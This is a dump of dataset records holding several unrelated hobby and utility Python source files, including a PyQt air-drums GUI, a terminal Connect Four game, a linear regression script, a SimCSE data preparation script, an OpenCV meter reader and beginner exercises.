cv2\n\nfrom ui_main_window1 import *\nfrom ui_opening_window import *\nimport iot_drums as iot\n\n\nclass OpeningWindow(QDialog):\n # class constructor\n def __init__(self):\n # call QWidget constructor\n super().__init__()\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.setWindowTitle(\"Air Drums\")\n\n self.ui.pushButton.clicked.connect(self.MoveToMainWindow)\n\n def MoveToMainWindow(self):\n mainWindow = MainWindow()\n size = mainWindow.size()\n widget.addWidget(mainWindow)\n widget.setCurrentIndex(widget.currentIndex() + 1)\n widget.resize(size)\n\n\nclass MainWindow(QMainWindow):\n # class constructor\n def __init__(self):\n # call QWidget constructor\n super().__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.setWindowTitle(\"Air Drums\")\n\n # create a timer\n self.timer = QTimer()\n # set timer timeout callback function\n 
self.timer.timeout.connect(self.putStream)\n # set control_bt callback clicked function\n self.iot = self.init_iot_drums()\n self.player = QtMultimedia.QMediaPlayer()\n self.initGui()\n\n def initGui(self):\n self.ui.start_bt.clicked.connect(self.controlTimer)\n self.ui.actionPlay_Song.triggered.connect(self.playSong)\n self.ui.actionCalibrate.triggered.connect(self.iot.vs.calibrate_sticks)\n self.ui.songVolumeSlider.valueChanged[int].connect(self.changeVolume)\n self.setWindowIcon(QtGui.QIcon('icon.png'))\n self.ui.bt_vol_icon.setIcon(self.style().standardIcon(QStyle.SP_MediaVolume))\n self.ui.actionCalibrate_Leg.triggered.connect(self.iot.vs.calibrate_leg)\n self.ui.actionSave_Calibration.triggered.connect(self.iot.vs.save_calibration)\n self.ui.actionFinish_Sticks_Calibration.triggered.connect(self.iot.vs.finish_calibrate)\n self.ui.left_bt.setIcon(self.style().standardIcon(QStyle.SP_ArrowLeft))\n self.ui.right_bt.setIcon(self.style().standardIcon(QStyle.SP_ArrowRight))\n self.ui.left_bt.clicked.connect(lambda: self.changeStream(-1))\n self.ui.right_bt.clicked.connect(lambda: self.changeStream(1))\n self.ui.checkBox_Arduino.stateChanged.connect(lambda: self.set_Arduino(self.ui.checkBox_Arduino.isChecked()))\n self.ui.checkBox_MIDI.stateChanged.connect(lambda: self.set_MIDI(self.ui.checkBox_MIDI.isChecked()))\n self.ui.checkBox_Depth.stateChanged.connect(lambda: self.iot.pm.set_isDepthOn(self.ui.checkBox_Depth.isChecked()))\n self.ui.checkBox_circle_sticks.stateChanged.connect(lambda: self.iot.setDrawSticks(self.ui.checkBox_circle_sticks.isChecked()))\n\n\n def set_MIDI(self, MIDI_state):\n self.iot.pm.is_midi = MIDI_state\n if MIDI_state:\n self.iot.pm.open_port()\n else:\n self.iot.pm.close_port()\n\n def set_Arduino(self, Arduino_state):\n if Arduino_state:\n self.iot.pm.arduino_config(Arduino_state)\n else:\n self.iot.pm.close_arduino()\n\n\n def init_iot_drums(self):\n self.stream_num=0\n self.streams_name = [\"Sticks Stream\", \"Leg Stream\", \"Depth Stream\"]\n return iot.iot_drums()\n\n def changeVolume(self, value):\n self.player.setVolume(value)\n\n def changeStream(self,x):\n self.stream_num = (self.stream_num+x) % 3\n self.ui.stream_label.setText(self.streams_name[self.stream_num])\n\n\n def putStream(self):\n color_frame, secondary_frames = self.iot.iteration()\n color_frame = cv2.cvtColor(color_frame, cv2.COLOR_BGR2RGB)\n sec_frame = cv2.cvtColor(secondary_frames[self.stream_num], cv2.COLOR_BGR2RGB)\n\n height, width, channel = color_frame.shape\n step = channel * width\n # create QImage from image\n qImg_stream1 = QImage(color_frame.data, width, height, step, QImage.Format_RGB888)\n qImg_stream2 = QImage(sec_frame.data, width, height, step, QImage.Format_RGB888)\n # show image in img_label\n self.ui.stream1.setPixmap(QPixmap.fromImage(qImg_stream1))\n self.ui.stream1.mousePressEvent = self.getPixel\n\n self.ui.stream2.setPixmap(QPixmap.fromImage(qImg_stream2))\n #for expanding\n #self.ui.stream1.setScaledContents(True)\n #self.ui.stream1.setSizePolicy(QtWidgets.QSizePolicy.Ignored,QtWidgets.QSizePolicy.Ignored)\n\n\n\n def getPixel(self, event):\n x = event.pos().x()\n y = event.pos().y()\n self.iot.vs.calibrate_callback(x,y)\n\n\n # start/stop timer\n def controlTimer(self):\n # if timer is stopped\n if not self.timer.isActive():\n # create video capture\n self.cap = cv2.VideoCapture(0)\n # start timer\n self.timer.start()\n # update control_bt text\n self.ui.start_bt.setText(\"Stop\")\n # if timer is started\n else:\n # stop timer\n self.timer.stop()\n # release video 
capture\n self.cap.release()\n # update control_bt text\n self.ui.start_bt.setText(\"Start\")\n\n def playSong(self):\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n files, _ = QFileDialog.getOpenFileNames(self, \"QFileDialog.getOpenFileNames()\", \"\",\n \"All Files (*);;Python Files (*.py)\", options=options)\n if files:\n print(files)\n url = QtCore.QUrl.fromLocalFile(*files)\n content = QtMultimedia.QMediaContent(url)\n self.player.setMedia(content)\n self.player.play()\n self.player.setVolume(int(self.ui.songVolumeSlider.value()))\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n\n # create and show mainWindow\n widget = QtWidgets.QStackedWidget()\n #mainWindow = MainWindow()\n openingWindow = OpeningWindow()\n widget.addWidget(openingWindow)\n #widget.addWidget(mainWindow)\n widget.resize(openingWindow.size())\n widget.show()\n\n #mainWindow.show()\n\n sys.exit(app.exec_())","repo_name":"almog-a/iot_drums-","sub_path":"src/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":6603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5531807312","text":"def main():\n print('i=?')\n pi = int(input())\n print('n=?')\n n = int(input())\n print('a['+str(n)+']=?')\n a = [int(i) for i in input().split(' ')]\n\n pivot(a, pi)\n \n print(a)\n\ndef pivot(a, pi):\n smaller = 0\n equal = 0\n larger = len(a)\n\n pivot = a[pi]\n\n while (equal < larger):\n if a[equal] < pivot:\n a[smaller], a[equal] = a[equal], a[smaller]\n smaller, equal = smaller + 1, equal + 1\n elif a[equal] == pivot:\n equal += 1\n else: \n larger -= 1\n a[equal], a[larger] = a[larger], a[equal]\n\n\nif __name__ == '__main__':\n main()","repo_name":"kezarmader/pythonPractice","sub_path":"dutch_flag_v1.py","file_name":"dutch_flag_v1.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20829197095","text":"\"\"\"\nAuthor: Novanator 2012\nProgram: Translation\n\"\"\"\n\n\nclass Queue(object):\n\n class __Node(object):\n def __init__(self,value):\n self.value = value\n self.next=None\n\n \n def __init__(self):\n self.__first=None\n self.__last=None\n \n def put(self, x):\n p = Queue.__Node(x)\n if self.__first==None:\n self.__first = p\n self.__last = p\n else:\n tmp = self.__last \n tmp.next = p \n self.__last = p \n \n def get(self):\n if self.__first!=None:\n x = self.__first.value\n self.__first = self.__first.next\n return x\n return None\n\n def isempty(self):\n if self.__first==None:\n return True\n else:\n return False\n\n def show(self):\n p=self.__first\n while p != None:\n print(p.value,end=\" \")\n p = p.next\n\nclass Translate:\n def __init__(self,swe,swa):\n self.swe=swe\n self.swa=swa\n\nf=open(\"swabadoo.txt\",\"r\")\nif f!=\"\":\n print(\"Wordlist read!\")\nq=Queue()\nlist=[]\nword=f.readline()\nwhile word!=\"\":\n word=word.strip()\n list.append(word)\n word=f.readline()\n\nfor i in range(0,14,2):\n g=Translate(list[i],list[i+1])\n q.put(g)\n\nwhile not q.isempty():\n glossary=q.get()\n print(\"Translate to Swabadoo:\",glossary.swe)\n answer=input(\"\")\n if answer != glossary.swa:\n print(\"No, the right answer is: \",glossary.swa)\n q.put(glossary) \n else:\n print(\"Correct!\")\n \n\n \n \n \n \n \n\n\n\n\n\n\n\n\n 
\n","repo_name":"novanator/translation-py","sub_path":"translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"42277479004","text":"import pandas as pd\nimport numpy as np \nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef VectorisedLinearRegression(X, Y):\n\tX_T = np.transpose(X)\n\ttobe_inv = np.dot(X_T, X)\n\tinv = np.linalg.inv(tobe_inv)\n\tA = np.dot(inv, X_T)\n\tweights = np.dot(A, Y)\n\n\treturn weights\n\ndata = pd.read_excel('data.xlsx')\ndata = (data - data.mean())/data.std()\ndata = np.c_[np.ones(data.shape[0]), data]\ndata = pd.DataFrame(data)\ndata.columns = ['x0', 'x1', 'x2', 'y']\nX = np.array(data.loc[:,['x0', 'x1', 'x2']])\nY = np.array(data['y'])\n\nweights = VectorisedLinearRegression(X, Y)\n\nprint(weights)","repo_name":"maneeshsistla8/NNFL-Implementations","sub_path":"Assignment1/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"18857478302","text":"import os, re, time, random, keyboard, math, platform\n\nif platform.system() == \"Windows\":\n pass\nelse:\n try:\n os.system(\"stty -echo\") #makes text entered in terminal invisible\n except:\n pass\n\ntry:\n height = int(re.search(\"(\\d+)\\)\", str(os.get_terminal_size())).group(1))-1 #the terminal needs -1 because uh\n width = int(re.search(\"(\\d+),\", str(os.get_terminal_size())).group(1))\nexcept OSError: #if not ran in terminal\n print(\"This game should be played in the terminal.\")\n time.sleep(2)\n height = 14\n width = 30\n # exit()\n\nif height < 14 or width < 30:\n print(\"The terminal size should be at least 30x14 (width x height)\")\n time.sleep(2)\n\n#variables and lists\narray = [\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n]\n# 0 - nothing\n\ncursor = 1 #cursor or arrow position\nisexit = False\nturn = 1 # 1 - player 1's turn, etc\nupdate = 0 # need to update??\nxoffset = \" \"*(math.floor((width - 29) / 2))\nyoffset = math.floor((height - 13) / 2)-1\nwin = 0\n\n\n#Key listners and actions\n\ndef keyright(x):\n global cursor, update\n \n if cursor < 7:\n cursor = cursor + 1\n update = 1\n\ndef keyleft(x):\n global cursor, update\n\n if cursor > 1:\n cursor = cursor - 1\n update = 1\n\ndef quitgame(x):\n global isexit\n isexit = True\n update = 1\n \n\ndef place(x):\n global turn, array, cursor, update\n \n if win == 0 and \"0\" in array[0]:\n if array[0][cursor-1] == \"0\": #if the thing isnt full\n for i in range(0, 6):\n if array[5-i][cursor-1] == \"0\":\n array[5-i][cursor-1] = str(turn).replace(\"1\", \"●\").replace(\"2\", \"○\")\n break\n if i == 6:\n no = True\n break\n\n if turn == 1:\n turn = 2\n else:\n turn = 1\n checkwin()\n update = 1\n else:\n\n reset()\n update = 1\n\ndef reset():\n global array, turn, win\n win = 0\n array = [\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", 
\"0\", \"0\"],\n ]\n turn = 1\n cursor = 0\n\ndef checkwin():\n global array, update, win\n\n #vertical\n for i in range(0, 3):\n for ii in range(0, 7):\n if array[i][ii] + array[i+1][ii] + array[i+2][ii] + array[i+3][ii] == \"●●●●\":\n win = 1\n break\n if array[i][ii] + array[i+1][ii] + array[i+2][ii] + array[i+3][ii] == \"○○○○\":\n win = 2\n break\n \n #horizontal\n for i in range(0, 4):\n for ii in range(0, 6):\n if array[ii][i] + array[ii][i+1] + array[ii][i+2] + array[ii][i+3] == \"●●●●\":\n win = 1\n break\n if array[ii][i] + array[ii][i+1] + array[ii][i+2] + array[ii][i+3] == \"○○○○\":\n win = 2\n break\n \n # diagonal (left up to right down)\n for i in range(0, 4):\n for ii in range(0, 3):\n if array[ii][i] + array[ii+1][i+1] + array[ii+2][i+2] + array[ii+3][i+3] == \"●●●●\":\n win = 1\n break\n if array[ii][i] + array[ii+1][i+1] + array[ii+2][i+2] + array[ii+3][i+3] == \"○○○○\":\n win = 2\n break\n\n # diagonal (right up to left down)\n for i in range(0, 4):\n for ii in range(0, 3):\n if array[5-ii][i] + array[4-ii][i+1] + array[3-ii][i+2] + array[2-ii][i+3] == \"●●●●\":\n win = 1\n break\n if array[5-ii][i] + array[4-ii][i+1] + array[3-ii][i+2] + array[2-ii][i+3] == \"○○○○\":\n win = 2\n break\n\n\nkeyboard.on_press_key(\"right arrow\", keyright)\nkeyboard.on_press_key(\"left arrow\", keyleft)\nkeyboard.on_press_key(\"space\", place)\nkeyboard.on_press_key(\"e\", quitgame)\n\n\n\ndef printline(x):\n if x == 1 or x == 8:\n print(xoffset + \" ━╋━━━━━━━━━━━━━━━━━━━━━╋━\")\n elif x >= 2 and x <= 7:\n line = [' ', ' ', ' ', '┃', ' ', '·', ' ', ' ', '·', ' ', ' ', '·', ' ', ' ', '·', ' ', ' ', '·', ' ', ' ', '·', ' ', ' ', '·', ' ', '┃', ' ']\n fline = []\n count = 0\n for i in range(0, len(line)):\n if line[i] == \"·\":\n fline.append(re.sub(\"(·)\", array[x-2][count].replace(\"0\", \"·\").replace(\"1\", \"●\").replace(\"2\", \"○\"), line[i], count=1, flags=0))\n count = count+1\n else:\n fline.append(line[i])\n print(xoffset + \"\".join(fline))\n elif x == 10:\n print(xoffset + \" \"+\" \"*cursor+\"▲\")\n elif x == 9:\n print(xoffset + \" 1 2 3 4 5 6 7\")\n else:\n if win == 0:\n if \"0\" in array[0]:\n if turn == 1:\n print(\"\\n\"+xoffset+\"P1 - ● (P1's turn)\"+\"\\n\"+xoffset+\"P2 - ○\")\n else:\n print(\"\\n\"+xoffset+\"P1 - ●\"+\"\\n\"+xoffset+\"P2 - ○ (P2's turn)\")\n else:\n print(\"\\n\"+xoffset+\" Draw!\"+\"\\n\"+xoffset+\" Press space to play again!\")\n else:\n print(\"\\n\"+xoffset+\" ★ Player \"+str(win)+\" has won ★\"+\"\\n\"+xoffset+\" Press space to play again!\")\n\n# main thing\n\nwhile True:\n for i in range(0, yoffset+2):\n print(\"\\n\")\n for i in range(1, 12):\n printline(i)\n for i in range(0, yoffset-2):\n print(\"\\n\")\n \n update = 0\n while update == 0:\n pass\n if isexit == True:\n exit()\n\n","repo_name":"TheSavageTeddy/TerminalGames","sub_path":"connect4.py","file_name":"connect4.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26909223867","text":"import os\nimport random\nfrom tools.file_util import load_dataset, save_json\n\ndef _get_combine(data):\n resuts = {}\n for case in data:\n text1 = case['text1']\n text2 = case['text2']\n label = case['label']\n\n if text1 not in resuts:\n resuts[text1] = {}\n resuts[text1][label] = text2\n return resuts\n\ndef _get_simcse_example(data_combine):\n results = []\n example_set = set([])\n\n for text1, infos in data_combine.items():\n if \"0\" not in infos or \"1\" not in infos:\n continue\n\n text2 = 
infos[\"1\"]\n text3 = infos[\"0\"]\n temp1 = text1 + text2 + text3\n temp2 = text2 + text1 + text3\n\n if temp1 in example_set or temp2 in example_set:\n continue\n example_set.add(temp1)\n case = {\n \"text1\": text1,\n \"text2\": text2,\n \"text3\": text3\n }\n results.append(case)\n return results\n\n\ndef prepare_simcse(data):\n data_combine = _get_combine(data)\n print(\"data_combin={}\".format(len(data_combine)))\n simcse_examples = _get_simcse_example(data_combine)\n print(\"simcse_examples={}\".format(len(simcse_examples)))\n return simcse_examples\n\n\nif __name__ == '__main__':\n dirs = ['bq_corpus', 'lcqmc', 'paws-x-zh']\n subsets = [\"train\", \"dev\"]\n\n filedir = \"data/simcse/\"\n if not os.path.exists(filedir):\n os.mkdir(filedir)\n\n train_data = []\n dev_data = []\n for dir in dirs:\n datasets = load_dataset(dir, subsets=subsets)\n train_data += datasets[0]\n dev_data += datasets[1]\n print(\"train_data={}, dev_data={}\".format(len(train_data), len(dev_data)))\n\n train_file = filedir + \"train.json\"\n train_simcse_examples = prepare_simcse(train_data)\n random.shuffle(train_simcse_examples)\n save_json(train_simcse_examples, train_file)\n\n dev_file = filedir + \"dev.json\"\n dev_simcse_examples = prepare_simcse(dev_data)\n random.shuffle(dev_simcse_examples)\n save_json(dev_simcse_examples, dev_file)\n\n\n","repo_name":"xxyliuyang/qianyan_similarity","sub_path":"data_process/prepare_simcse_data.py","file_name":"prepare_simcse_data.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"948319103","text":"import os\r\nimport cv2\r\nimport json\r\nimport numpy as np\r\nfrom datetime import datetime\r\nfrom meter_digits_recognizer import MeterDigitsRecognizer\r\n\r\nPACKAGE_DIR = os.path.dirname(os.path.abspath(__file__))\r\n\r\ndef rotate_image(image, angle_deg):\r\n image_center = tuple((np.array(image.shape[1::-1]) - 1.0) / 2)\r\n rot_mat = cv2.getRotationMatrix2D(image_center, angle_deg, 1.0)\r\n result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)\r\n return result\r\n\r\nclass AutomaticMeterReader:\r\n \r\n def __init__(self, camera_model, meter_model):\r\n self.camera_model = camera_model\r\n self.meter_model = meter_model\r\n \r\n with open(os.path.join(PACKAGE_DIR, \"cameras\", \"%s.json\" % (self.camera_model)), \"r\") as f:\r\n camcalib = json.load(f)\r\n self.camera_matrix = np.resize(np.array(camcalib[\"camera_matrix\"]), (3, 3))\r\n self.distortion_coefs = np.resize(np.array(camcalib[\"distortion_coefs\"]), (1, len(camcalib[\"distortion_coefs\"])))\r\n self.new_camera_matrix = np.resize(np.array(camcalib[\"new_camera_matrix\"]), (3, 3))\r\n \r\n with open(os.path.join(PACKAGE_DIR, \"meter_models\", meter_model, \"meter_config.json\"), \"r\") as f:\r\n self.meter_config = json.load(f)\r\n self.template_imgs = []\r\n for template_conf in self.meter_config[\"templates\"]:\r\n template_img = cv2.imread(os.path.join(PACKAGE_DIR, \"meter_models\", self.meter_model, template_conf[\"file\"]))\r\n self.template_imgs.append(template_img)\r\n \r\n self.mdr = MeterDigitsRecognizer()\r\n self.img_original = None\r\n self.img_undistorted = None\r\n self.img_aligned = None\r\n self.img_debug = None\r\n\r\n def readout(self, img):\r\n self.img_original = img\r\n self.undistort_and_prepare()\r\n self.align_image()\r\n self.get_measurement()\r\n self.make_debug_image()\r\n return self.measurement\r\n \r\n def undistort_and_prepare(self):\r\n 
self.img_undistorted = cv2.undistort(self.img_original, self.camera_matrix, self.distortion_coefs, None, self.new_camera_matrix)\r\n # TODO: Integrate into new_camera_matrix\r\n if \"pre_rotation_angle_deg\" in self.meter_config:\r\n self.img_undistorted = rotate_image(self.img_undistorted.copy(), self.meter_config[\"pre_rotation_angle_deg\"])\r\n if \"pre_crop\" in self.meter_config:\r\n x0, y0, dx, dy = self.meter_config[\"pre_crop\"]\r\n x1, y1 = min(self.img_undistorted.shape[1], x0 + dx), min(self.img_undistorted.shape[0], y0 + dy)\r\n self.img_undistorted = self.img_undistorted[y0:y1, x0:x1]\r\n \r\n def align_image(self):\r\n src_points, dst_points = [], []\r\n for template_conf, template_img in zip(self.meter_config[\"templates\"], self.template_imgs):\r\n x0, y0, dx, dy = template_conf[\"roi\"]\r\n\r\n match = cv2.matchTemplate(self.img_undistorted, template_img, cv2.TM_CCORR_NORMED)\r\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(match)\r\n top_left = max_loc\r\n\r\n src_points.append((top_left[0] + 0.5 * dx - 0.5, top_left[1] + 0.5 * dy - 0.5))\r\n dst_points.append((x0 + 0.5 * dx - 0.5, y0 + 0.5 * dy - 0.5))\r\n\r\n M = cv2.getAffineTransform(np.float32(src_points), np.float32(dst_points))\r\n self.img_aligned = cv2.warpAffine(self.img_undistorted, M, (self.img_undistorted.shape[1], self.img_undistorted.shape[0]), flags=cv2.INTER_LINEAR)\r\n\r\n def get_measurement(self):\r\n digit_imgs = []\r\n for i, digit_conf in enumerate(self.meter_config[\"register\"][\"digits\"]):\r\n x0, y0, dx, dy = digit_conf[\"roi\"]\r\n digit_img = self.img_aligned[y0:y0+dy, x0:x0+dx]\r\n digit_imgs.append(digit_img)\r\n predictions, confidences = self.mdr.run(digit_imgs)\r\n \r\n res = 0.0\r\n digits = self.meter_config[\"register\"][\"digits\"]\r\n for i, digit_conf in enumerate(digits):\r\n if predictions[i] == 10:\r\n if i + 1 < len(digits):\r\n res = None\r\n break\r\n res += digit_conf[\"multiplier\"] * predictions[i]\r\n \r\n self.digit_imgs = digit_imgs\r\n self.predictions = predictions\r\n self.confidences = confidences\r\n self.measurement = res\r\n \r\n def make_debug_image(self):\r\n res = self.img_aligned.copy()\r\n stamp_str = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n print(\"stamp_str:\", stamp_str)\r\n\r\n # Templates\r\n for template_conf in self.meter_config[\"templates\"]:\r\n x0, y0, dx, dy = template_conf[\"roi\"]\r\n pen_width = 1.0\r\n cv2.rectangle(res, (x0 - 1, y0 - 1), (x0 + dx, y0 + dy), (255, 0, 0), 1)\r\n\r\n # Register\r\n #x0, y0, dx, dy = self.meter_config[\"register\"][\"roi\"]\r\n #cv2.rectangle(res, (x0 - 1, y0 - 1), (x0 + dx, y0 + dy), (0, 0, 255), 1)\r\n for digit_conf in self.meter_config[\"register\"][\"digits\"]:\r\n x0, y0, dx, dy = digit_conf[\"roi\"]\r\n cv2.rectangle(res, (x0 - 1, y0 - 1), (x0 + dx, y0 + dy), (0, 0, 255), 1)\r\n\r\n # Measurement\r\n x0, y0, dx, dy = self.meter_config[\"register\"][\"roi\"]\r\n font_size = 1.0 / 465.0 * dx\r\n for i, digit_conf in enumerate(self.meter_config[\"register\"][\"digits\"]):\r\n x0, y0, dx, dy = digit_conf[\"roi\"]\r\n if self.confidences[i] < 0.9:\r\n color = (0, 0, 255)\r\n elif self.confidences[i] < 0.995:\r\n color = (33, 137, 235)\r\n else:\r\n color = (56, 245, 39)\r\n \r\n cv2.putText(res, \"%s\" % (str(self.predictions[i]) if self.predictions[i] <= 9 else \"-\"), (x0 + dx // 4, y0 - dy // 4), cv2.FONT_HERSHEY_SIMPLEX, font_size, color, 3, cv2.LINE_AA) \r\n cv2.putText(res, \"%.0f\" % (1e2 * self.confidences[i]), (x0 - dx // 5, y0 - dy), cv2.FONT_HERSHEY_SIMPLEX, 0.8 * font_size, color, 
3, cv2.LINE_AA) \r\n\r\n # Stamp\r\n cv2.putText(res, stamp_str, (int(10 * font_size), int(res.shape[0] - 10 * font_size)), cv2.FONT_HERSHEY_SIMPLEX, 0.8 * font_size, color, 3, cv2.LINE_AA) \r\n\r\n self.img_debug = res\r\n\r\nif __name__ == \"__main__\":\r\n pass","repo_name":"ardiloot/automatic-meter-reader","sub_path":"automatic_meter_reader/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"25513931677","text":"my_set ={1, 2, 4, 10}\nmy_fav_numbers= my_set\nmy_fav_numbers.add(12)\nmy_fav_numbers.add(18)\nmy_fav_numbers.remove(18)\nprint(my_fav_numbers)\nnew_set = {\"CML\", \"Hindel\", \"Bazel\"}\nfriend_fav_numbers = new_set\nset_3 = friend_fav_numbers | my_fav_numbers\nour_fav_numbers= set_3\nprint(our_fav_numbers)\n\n# Given a tuple which value is integers, is it possible to add more integers to the tuple?\n# No\n\n\nfor number in range(1,21):\n print(number)\n\n# Recap – What is a float? What is the difference between an integer and a float?\n # It is a decimal, and an integer is a whole number.\n# Can you think of another way to generate a sequence of floats?\n # In a list\n #Create a list containing the following sequence 1.5, 2, 2.5, 3, 3.5, 4, 4.5, 5 (don’t hard-code the sequence).\n # list =[\"1.5\", \"2\", \"2.5\", \"3\", \"3.5\", \"4\", \"4.5\", \"5\"]\n #print([float(x) for x in a])\n\nbasket = [\"Banana\", \"Apples\", \"Oranges\", \"Blueberries\"];\nbasket.remove(\"Banana\") \nbasket.remove(\"Blueberries\")\nbasket.append(\"kiwi\")\nbasket.insert(0,\"Apples\")\ncount = basket.count(\"Apples\")\nprint(count)\nbasket.clear()\nprint(basket)\n\nactive = True\nwhile active:\n user_input = input(\"what is your name\")\n if user_input == \"Malka\":\n active = False\n\nmy_list = list(range(1,50))\nfor obj in my_list:\n index = my_list.index(obj)\n if index%2==0:\n print(obj)\n\nfor digit in range(1500, 2501):\n if digit%5==0 and digit%7==0:\n print(digit)\n\nuser_fruits= input(\"List one or more of your favorite fruits with a space in between\")\nlist2 = user_fruits.split(\" \")\nuser_again = input(\"Name any fruit\")\nif user_again in list2:\n print(\"You chose one of your favorite fruits! Enjoy!\")\nelse:\n print(\"You chose a new fruit. 
I hope you enjoy.\")\n\n\nlist3 =[]\nwhile True:\n pizza_username = input(\"Enter a series of pizza toppings\")\n if \"quit\" == pizza_username:\n break\n toppings = pizza_username.split()\n print(\"I'll add\", toppings, \"to the pizza\")\n list3 += toppings\n \nprint(list3)\ntotal = len(list3)\nprint((total*2.5)+10)\n\nlist4 = []\ntotal = 0\nages = input(\"List each person's age\").split(\",\")\nfor age in ages:\n age= int(age)\n if age < 3:\n ticket = 0\n total+= ticket\n elif age > 3 and age < 12:\n ticket = 10\n total+= ticket\n else:\n ticket = 15\n total+= ticket\nprint(total)\n\nlist5 = []\nteen = [\"Greg\", \"Ashley\", \"Luna\"]\nfor ten in teen:\n restricted= (input(\"How old are you?\"))\n restricted= int(restricted)\n if restricted >= 16 and restricted <= 21:\n list5.append(ten)\nprint(list5)\n\nlist6 = [\"Tom\", \"Harry\", \"John\"]\nfor new_name in list6:\n new_remove = (input(\"How old are you?\"))\n new_remove= int(new_remove)\n if new_remove < 16:\n list6.remove(new_name)\nprint(list6)\n\nsandwich_orders= [\"deli\",\"pastrami\",\"pbj\",\"pastrami\",\"tuna\",\"pastrami\"]\nfinished_sandwiches = []\nprint(\"The deli has run out of pastrami\")\nwhile \"pastrami\" in sandwich_orders:\n sandwich_orders.remove(\"pastrami\")\nfor idx in range(len(sandwich_orders)):\n finished_sandwiches.append(sandwich_orders[idx])\n print(\"I have made your\", sandwich_orders[idx],\"sandwich\")\nfor sandwich in finished_sandwiches:\n if sandwich in sandwich_orders:\n sandwich_orders.remove(sandwich)\nprint(sandwich_orders)\nprint(finished_sandwiches)\n\n\n\n\n \n\n \n","repo_name":"malxdeutsch/di","sub_path":"Week4/Day2/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"7106277861","text":"from threading import Thread\nfrom struct import unpack\nfrom time import sleep\n\nimport gi\ngi.require_version('GLib', '2.0')\ngi.require_version('Hinawa', '3.0')\nfrom gi.repository import GLib, Hinawa\n\nfrom hinawa_utils.ta1394.config_rom_parser import Ta1394ConfigRomParser\nfrom hinawa_utils.ta1394.general import AvcConnection\nfrom hinawa_utils.ta1394.streamformat import AvcStreamFormatInfo\n\n__all__ = ['OxfwUnit']\n\n\nclass OxfwUnit(Hinawa.SndUnit):\n def __init__(self, path):\n super().__init__()\n self.open(path)\n if self.get_property('type') != 4:\n raise ValueError('The character device is not for OXFW unit')\n\n ctx = GLib.MainContext.new()\n self.create_source().attach(ctx)\n self.__unit_dispatcher = GLib.MainLoop.new(ctx, False)\n self.__unit_th = Thread(target=lambda d: d.run(), args=(self.__unit_dispatcher, ))\n self.__unit_th.start()\n\n node = self.get_node()\n ctx = GLib.MainContext.new()\n node.create_source().attach(ctx)\n self.__node_dispatcher = GLib.MainLoop.new(ctx, False)\n self.__node_th = Thread(target=lambda d: d.run(), args=(self.__node_dispatcher, ))\n self.__node_th.start()\n\n parser = Ta1394ConfigRomParser()\n info = parser.parse_rom(self.get_node().get_config_rom())\n self.vendor_name = info['vendor-name']\n self.model_name = info['model-name']\n\n self.fcp = Hinawa.FwFcp()\n self.fcp.bind(self.get_node())\n\n self.hw_info = self._parse_hardware_info()\n self.supported_sampling_rates = self._parse_supported_sampling_rates()\n self.supported_stream_formats = self._parse_supported_stream_formats()\n\n def release(self):\n self.fcp.unbind()\n self.__unit_dispatcher.quit()\n self.__node_dispatcher.quit()\n self.__unit_th.join()\n 
